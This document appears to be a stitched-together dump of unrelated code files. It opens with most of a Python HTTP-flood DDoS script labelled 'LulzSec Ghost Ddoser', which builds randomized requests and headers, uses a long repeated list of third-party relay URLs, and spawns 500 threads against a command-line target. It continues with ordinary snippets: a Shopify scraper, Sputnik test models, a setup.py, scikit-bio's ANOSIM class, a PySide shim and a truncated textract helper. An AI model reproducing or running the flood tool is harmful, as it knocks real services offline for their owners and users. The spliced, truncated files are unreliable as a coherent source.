bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
return(bots)
#builds random ascii string
def buildblock(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def usage():
print 'Pra usar python Lulz.py <url>'
print 'LulzSec Ghost Ddoser By V3I0p3r'
print 'Script Priv8 Privada da LulzSec Ghost'
print "\a"
print \
""" .
_____|\
_.--| LOL |:
<____|.----||
.---''---,
The ;..__..' _...
Lulz ,'/ ;|/..--'' \
Boat ,'_/.-/': :
_..-'''/ / | \ \ _|/|
\ /-./_ \; \ \,;' \
,\ / \: `:\ \ // `:`.
,' \ /-._; | : : :: ,. .
,' :: /`-._| | | || ' : `.`.)
_,' |;._:: | | | | `| : `'
,' `. / |`-:_ ; | | | : \
`--. ) /|-._: : | \ \
/ / :_| ;`-._; __..--'; : :
/ ( ;|;-./_ _/.-:'o | / ' |
/ , \._/_/_./--''/_|:|___|_,' |
: / `'-'--'----'---------' |
| : O ._O O_. O ._O O_. ; ;
: `. // // // // ,' /
~~~`.______//____//____//____//_______,'~
// //~ // //
~~ _// _// _// ~ _// ~
~ / / / / / / / / ~ ~~
~~~ ~~~ ~~~ ~~~
"""
#http request
def httpcall(url):
useragent_list()
referer_list()
code=0
if url.count("?")>0:
param_joiner="&"
else:
param_joiner="?"
request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
request.add_header('User-Agent', random.choice(headers_useragents))
request.add_header('Cache-Control', 'no-cache')
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
request.add_header('Keep-Alive', random.randint(110,120))
request.add_header('Connection', 'keep-alive')
request.add_header('Host',host)
try:
urllib2.urlopen(request)
except urllib2.HTTPError, e:
#print e.code
set_flag(1)
print '[+]~>LULZ ATTACK STARTRD<~'
print '[+]~~>LULZ ATTACK STARTRD<~~[+] '
code=500
except urllib2.URLError, e:
#print e.reason
sys.exit()
else:
inc_counter()
urllib2.urlopen(request)
return(code)
#http caller thread
class HTTPThread(threading.Thread):
def run(self):
try:
while flag<2:
code=httpcall(url)
if (code==800) & (safe==1):
set_flag(2)
except Exception, ex:
pass
# monitors http threads and counts requests
class MonitorThread(threading.Thread):
def run(self):
previous=request_counter
while flag==0:
if (previous+500<request_counter) & (previous<>request_counter):
print "%d lULZ Up" % (request_counter)
previous=request_counter
if flag==2:
print "\n -lULZ Finish"
#execute
if len(sys.argv) < 2:
usage()
sys.exit()
else:
if sys.argv[1]=="help":
usage()
sys.exit()
else:
print "Script Priv8 Privada da LulzSec Ghost"
if len(sys.argv)== 3:
if sys.argv[2]=="safe":
set_safe()
url = sys.argv[1]
if url.count("/")==2:
url = url + "/"
m = re.search('http\://([^/]*)/?.*', url)
host = m.group(1)
for i in range(500):
t = HTTPThread()
t.start()
t = MonitorThread()
t.start()
| 2.421875 | 2 |
extract.py | hiddeottens/shopify-scraper | 0 | 12797465 | path = './stores.csv'
import pandas as pd
from shopify import extract_products_json
result = ''
with open(path) as csvfile:
df = pd.read_csv(csvfile)
url = df['url']
products = extract_products_json(url)
print(products) | 2.6875 | 3 |
app/models.py | marintsev/sputniktests | 27 | 12797466 | <reponame>marintsev/sputniktests
#!/usr/bin/python
# Copyright 2009 the Sputnik authors. All rights reserved.
# This code is governed by the BSD license found in the LICENSE file.
from google.appengine.ext import db
import cStringIO
_ESCAPEES = {
'"': '\\"',
'\\': '\\\\',
'\b': '\\b',
'\f': '\\f',
'\n': '\\n',
'\r': '\\r',
'\t': '\\t'
}
def json_escape(s):
result = []
for c in s:
escapee = _ESCAPEES.get(c, None)
if escapee:
result.append(escapee)
elif c < ' ':
result.append("\\u%.4X" % ord(c))
else:
result.append(c)
return "".join(result)
def to_json(obj):
t = type(obj)
if t is dict:
props = [ ]
for (key, value) in obj.items():
props.append('"%s":%s' % (json_escape(key), to_json(value)))
return '{%s}' % ','.join(props)
elif (t is int) or (t is long):
return str(obj)
elif (t is str) or (t is unicode):
return '"%s"' % json_escape(obj)
elif (t is list):
return '[%s]' % ','.join([to_json(o) for o in obj])
elif t is bool:
if obj: return '1'
else: return '0'
else:
return to_json(obj.to_json())
class Case(db.Model):
name = db.StringProperty()
suite = db.StringProperty()
source = db.TextProperty()
serial = db.IntegerProperty()
is_negative = db.BooleanProperty()
def to_json(self):
return {'name': self.name,
'isNegative': self.is_negative,
'source': unicode(self.source)}
def to_basic_json(self):
return to_json({'name': self.name,
'isNegative': self.is_negative,
'serial': self.serial})
@staticmethod
def lookup(suite, serial):
query = Case.gql('WHERE suite = :1 AND serial = :2', suite, serial)
return query.get()
@staticmethod
def lookup_range(suite, start, end):
query = Case.gql('WHERE suite = :1 AND serial >= :2 AND serial < :3', suite, start, end)
return query.fetch(end - start)
class Suite(db.Model):
name = db.StringProperty()
count = db.IntegerProperty()
@staticmethod
def lookup(suite):
query = Suite.gql('WHERE name = :1', suite)
return query.get()
def to_json(self):
return to_json({'name': self.name, 'count': self.count})
class Version(db.Model):
current_suite = db.StringProperty()
created = db.DateTimeProperty(auto_now_add=True)
@staticmethod
def get():
query = Version.gql("ORDER BY created DESC LIMIT 1")
return query.get()
| 2.140625 | 2 |
setup.py | Mayukhdeb/taming-transformers | 0 | 12797467 | from setuptools import setup, find_packages
with open('requirements.txt') as f:
required = f.read().splitlines()
setup(
name='taming-transformers',
version='0.0.1-eden',
description='Taming Transformers for High-Resolution Image Synthesis',
packages=find_packages(),
include_package_data=True,
install_requires= required,
)
| 1.304688 | 1 |
skbio/stats/distance/_anosim.py | JWDebelius/scikit-bio | 0 | 12797468 | #! /usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
import numpy as np
from scipy.stats import rankdata
from ._base import CategoricalStats
class ANOSIM(CategoricalStats):
"""ANOSIM statistical method executor.
Analysis of Similarities (ANOSIM) is a non-parametric method that tests
whether two or more groups of objects are significantly different based on
a categorical factor. The ranks of the distances in the distance matrix are
used to calculate an R statistic, which ranges between -1 (anti-grouping)
to +1 (strong grouping), with an R value of 0 indicating random grouping.
Notes
-----
See [1]_ for the original ANOSIM reference. The general algorithm and
interface are similar to ``vegan::anosim``, available in R's vegan package
[2]_.
References
----------
.. [1] <NAME>. "Non-parametric multivariate analyses of changes in
community structure." Australian journal of ecology 18.1 (1993):
117-143.
.. [2] http://cran.r-project.org/web/packages/vegan/index.html
"""
short_method_name = 'ANOSIM'
long_method_name = 'Analysis of Similarities'
test_statistic_name = 'R statistic'
def __init__(self, distance_matrix, grouping, column=None):
super(ANOSIM, self).__init__(distance_matrix, grouping, column=column)
self._divisor = self._dm.shape[0] * ((self._dm.shape[0] - 1) / 4)
self._ranked_dists = rankdata(self._dm.condensed_form(),
method='average')
def _run(self, grouping):
"""Compute ANOSIM R statistic (between -1 and +1)."""
# Create a matrix where True means that the two objects are in the same
# group. This ufunc requires that grouping is a numeric vector (e.g.,
# it won't work with a grouping vector of strings).
grouping_matrix = np.equal.outer(grouping, grouping)
# Extract upper triangle from the grouping matrix. It is important to
# extract the values in the same order that the distances are extracted
# from the distance matrix (see self._ranked_dists). Extracting the
# upper triangle (excluding the diagonal) preserves this order.
grouping_tri = grouping_matrix[self._tri_idxs]
return self._compute_r_stat(grouping_tri)
def _compute_r_stat(self, grouping_tri):
# within
r_W = np.mean(self._ranked_dists[grouping_tri])
# between
r_B = np.mean(self._ranked_dists[np.invert(grouping_tri)])
return (r_B - r_W) / self._divisor
| 2.609375 | 3 |
project_template/project_main_app/__init__.py | mciucu/manage-stem-app | 1 | 12797469 | <filename>project_template/project_main_app/__init__.py
default_app_config = "{{ project_main_app}}.apps.MainAppConfig"
| 1.15625 | 1 |
singlesiding/pyside.py | ewerybody/siding | 0 | 12797470 | <reponame>ewerybody/siding<gh_stars>0
"""
singlesiding supports PySide2 and 6 but needs to adapt to whats
already imported NOT whats available! Thus we deal with it here.
"""
import sys
if 'PySide6' in sys.modules:
from PySide6 import QtCore, QtWidgets, QtNetwork
elif 'PySide2' in sys.modules:
from PySide2 import QtCore, QtWidgets, QtNetwork
else:
try:
from PySide6 import QtCore, QtWidgets, QtNetwork
except ImportError:
from PySide2 import QtCore, QtWidgets, QtNetwork
| 1.492188 | 1 |
extract_table/textract_all.py | shaoyuliusz/faculty_salary | 0 | 12797471 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pandas as pd
import os
import time
import glob
import sys
import textract_python_table_parser as tptp
'''
File name: testract_all.py
Author: <NAME>
Date created: 12/08/2021
Python Version: 3.9
'''
#change to the directory
#cd /Users/apple/Desktop/research_fellow_documents/process_illinois/
def get_direc(direc):
"""get the lists of all files under the directory"""
path = os.path.join(direc, direc+'png', '*png')
direc_list = glob.glob(path)
